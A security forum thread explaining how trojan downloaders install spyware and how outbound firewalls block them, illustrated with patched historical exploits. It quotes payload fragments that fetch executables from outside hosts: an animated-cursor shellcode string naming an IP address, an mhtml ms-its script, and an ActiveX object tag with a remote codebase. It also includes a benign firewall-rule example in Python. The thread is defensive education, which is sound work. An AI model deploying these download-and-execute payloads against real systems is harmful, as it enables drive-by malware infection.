mysec (Premium Member, join:2005-11-29)

Firewall Outbound Protection: It can augment a security plan

Ask people how adware and spyware get installed, and many may not know about trojan droppers and downloaders, or understand how they work.

An acquaintance took her computer to a shop to remove Spy Sheriff. She found it hard to realize that it was a downloader, and not Windows, that caused the "you are infected" notice to display.

Most malware today is created to make money. This is achieved by surreptitiously installing spyware, adware, keyloggers, etc., and is often accomplished by means of a trojan "downloader." This file, once successfully installed, connects out to the internet to download malware of all types, and often, more downloaders to continue the cycle.

Sunbelt currently lists 405 Trojan Downloader threats.

If installed, trojans can still be blocked from carrying out their payload by a firewall with outbound protection,
• which alerts to any application attempting to connect out which has not previously been authorized to do so; or,
• which blocks an application by a specific rule.

Some examples follow.


Infection via email attachment: gift.com

When executed, gift.com copies itself to %windir% as winrpc.exe and attempts to connect out:

If it connects out, it downloads drsmartload.exe, the workhorse downloader of this exploit. This trojan has been seen in a number of exploits:

If it connects out successfully, a few "gifts" will be received:

Infection via email attachment: W32.Sober.Q

If the user executes the email attachment, the worm copies itself as Services.exe, and first attempts to connect out to a time server via port 37. There is a legitimate services.exe in Win2K/XP, but the firewall checks the application's MD5, sees a mis-match, and alerts:

Trojan piggy-backed on a program: Codec

Links on web sites to a Codec. When the codec.exe is downloaded/installed, the file also connects out via Windows Explorer.exe to download and install malware:

Attempt to disable Firewall: Bagle

Quote from a post on another forum:
    I did a booboo by starting to open a file called 06_05_2005.exe, when i realized it I stopped. But it has taken my firewall away,...
The poster didn't say if he had password protection enabled, which will block an attempt to disable the firewall service, as many Bagle variants try to do. Note the spoofed notepad icon:

Remote Code Execution: Animated Cursor Exploit

An animated cursor file is cached, and downloads win32.exe, which connects out to the internet:
GetProcAddress-LoadLibrary-GetSystemDirectory-urlmon.dll-URLDownloadToFile-WinExec-HTTP://195.225.177.33/vx/win32.exe

Remote Code Execution: mhtml exploit

Using a fake .chm file, Trojan.Downloader.Small, to download the trojan load.exe.

Classic case of one of the "loader" downloaders calling out for more downloaders:
<SCRIPT LANGUAGE="JavaScript">
obj = "<object data=\"ms-its:mhtml:file";
hxxp://traffweb.biz/dl/adv799/x.chm::/load.exe

Remote Code Execution: Browser Helper Object Exploit

IE Plugin connects to a web site, exfol.com. The site remotely downloads a Trojan, eins008.exe, Trojan-Downloader-Exfol:
<object id="sClass" classid="CLSID:444B911E-6E55-4a11-B3E9-0D3E21AE0437" codebase="http://www.exfol.com/v/1/i/eins008.exe"></object>

Remote Code Execution: wmf exploit

The wmf file downloads ioo.exe, detected by Trend Micro as TROJ_DLOADER.BFK. The said action further exposes the affected system to malicious threats. It then saves its downloaded malware as voi{Random number}.EXE one of which is voi548.exe, Trojan.Downloader.Win32.Agent. In order to see ioo.exe, I took a screen shot of it being blocked. Otherwise, it downloads so quickly in the background that you miss it:
<iframe src="wmf_exp.wmf"></iframe>

If successful, this trojan begins the installation of Spy Sheriff:

All of the above exploits have been patched, yet they continue to appear, especially in multiple-exploit malware embedded in websites, and, unfortunately, continue to infect unaware users.

Many may feel they are already well-protected from malware installing/executing.

However, if one is concerned about an unexpected, unforeseen (dare I say, "zero-day") occurrence, a firewall with outbound protection - or one of the newer products with application-outbound protection - will help contain the damage locally, and also prevent smtp email engines from sending out to harvested email addresses to infect others.


______________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
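The two checks the post relies on (alerting on any application with no outbound rule, and refusing a known path whose binary no longer hashes to the authorised one, as in the Services.exe case) modelled as an added example. This is illustrative code written for this page, not any firewall product's implementation; the paths, binaries, hashes, hosts and ports are constructed placeholders.

```python
import hashlib
from dataclasses import dataclass

# Constructed stand-ins for binaries the user previously authorised; a real
# firewall hashes the executable on disk. These are placeholder bytes.
LEGIT_SERVICES_EXE = b"constructed bytes standing in for the real services.exe"
FIREFOX_EXE = b"constructed bytes standing in for firefox.exe"

def file_hash(data: bytes) -> str:
    # The post's firewall compared MD5; SHA-256 serves the same purpose here.
    return hashlib.sha256(data).hexdigest()

# Allowlist keyed on the lower-cased image path (Windows paths are case-
# insensitive, so "Services.exe" must still hit the services.exe rule). Each
# rule pins the authorised binary's hash and the remote ports it may use
# (None = any port). The paths are assumed examples, not from the post.
RULES = {
    r"c:\windows\system32\services.exe": {"hash": file_hash(LEGIT_SERVICES_EXE), "ports": None},
    r"c:\program files\mozilla firefox\firefox.exe": {"hash": file_hash(FIREFOX_EXE), "ports": {80, 443}},
}

@dataclass
class ConnectAttempt:
    image_path: str     # process image trying to connect out
    image_bytes: bytes  # contents of that image, which the firewall hashes
    remote_host: str
    remote_port: int

def evaluate(attempt: ConnectAttempt, rules=RULES):
    """Return ('allow' or 'alert', reason) for one outbound connection attempt."""
    rule = rules.get(attempt.image_path.lower())
    if rule is None:
        # Never authorised: the user gets prompted (the gift.com / winrpc.exe case)
        return "alert", "no outbound rule for this application"
    if file_hash(attempt.image_bytes) != rule["hash"]:
        # Authorised path, different binary: the Sober-as-Services.exe case
        return "alert", "hash mismatch: binary differs from the authorised one"
    if rule["ports"] is not None and attempt.remote_port not in rule["ports"]:
        return "alert", "remote port %d not permitted by this rule" % attempt.remote_port
    return "allow", "matches outbound rule"

if __name__ == "__main__":
    # Constructed events mirroring the post's cases; hosts and ports are made up.
    for a in (
        ConnectAttempt(r"C:\Windows\System32\Services.exe", b"worm body", "time.example.net", 37),
        ConnectAttempt(r"C:\Windows\winrpc.exe", b"dropper body", "198.51.100.10", 80),
        ConnectAttempt(r"C:\Program Files\Mozilla Firefox\firefox.exe", FIREFOX_EXE, "example.com", 443),
    ):
        print(a.image_path, a.remote_port, *evaluate(a))
```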

psicop (Premium Member, join:2005-12-21, Australia)

Thanks for such an informative post (and the effort).

G.

Rocky67 (Premium Member, join:2005-01-13, Orange, CA) to mysec:
Very informative. Thanks once again for the info and hard work.

Cudni (MVM, join:2003-12-20, Someshire) to mysec:
Thanks for another great piece of info.

Just to add that many free fw will only have the password protection in their pay-for products

Cudni

mysec (Premium Member, join:2005-11-29)

psicop, Rocky67, Cudni:

I'm glad you found it informative
quote:
Just to add that many free fw will only have the password protection in their pay-for products
Thanks for that info - I wasn't aware of that. I can see limiting some things in a free version, but why would a company omit that important security feature?

Nanaki (banned) (Member, join:2002-01-24, Akron, OH)


Nicely done. The problem is even with outbound protection the victim is likely to allow it all out. Sad but true, most of those who get infected will get infected regardless of their security programs. They will click ok, yes, allow, etc. Whatever results in getting the prompts out of their way the fastest.

My brother is a prime example of such people: he will turn off AVs, uninstall them, remove his firewall, whatever it takes to prevent alerts. Course I suppose these sorts of people are the sort we're better off without. So let them show Darwinism in action and remove themselves from the net.

mysec (Premium Member, join:2005-11-29)


The problem of alerts is a very good point, which I will go into in another thread.


salzan (Premium Member, join:2004-01-08, WA State) to mysec:
Thanks for the effort.

Makes me feel even better about my Kerio 2.1.5.

(with password)

sivran (Premium Member, join:2003-09-15, Irving, TX) to Nanaki:
quote:
The problem is even with outbound protection the victim is likely to allow it all out. Sad but true, most of those who get infected will get infected regardless of their security programs. They will click ok, yes, allow, etc. Whatever results in getting the prompts out of their way the fastest.
Too true. On the other hand, some people get overzealous in BLOCKING things, and end up locking themselves in. They then call their ISP, their manufacturer, their geek son/grandson, saying their internet doesn't work.

McAfee and Symantec have tried to respond to this problem by making their firewall products definition-based, like virus scanners. I think we all know how much that helped.

OZO (Premium Member, join:2003-01-17) to mysec:
Thank you for drawing our attention to how important an outbound firewall is today.

psloss (Premium Member, join:2002-02-24) to mysec:
Thought I'd resurrect this thread to point out another take on outbound protection, though it is not the only topic of Jesper Johansson's blog post:
»blogs.technet.com/jesper ··· 921.aspx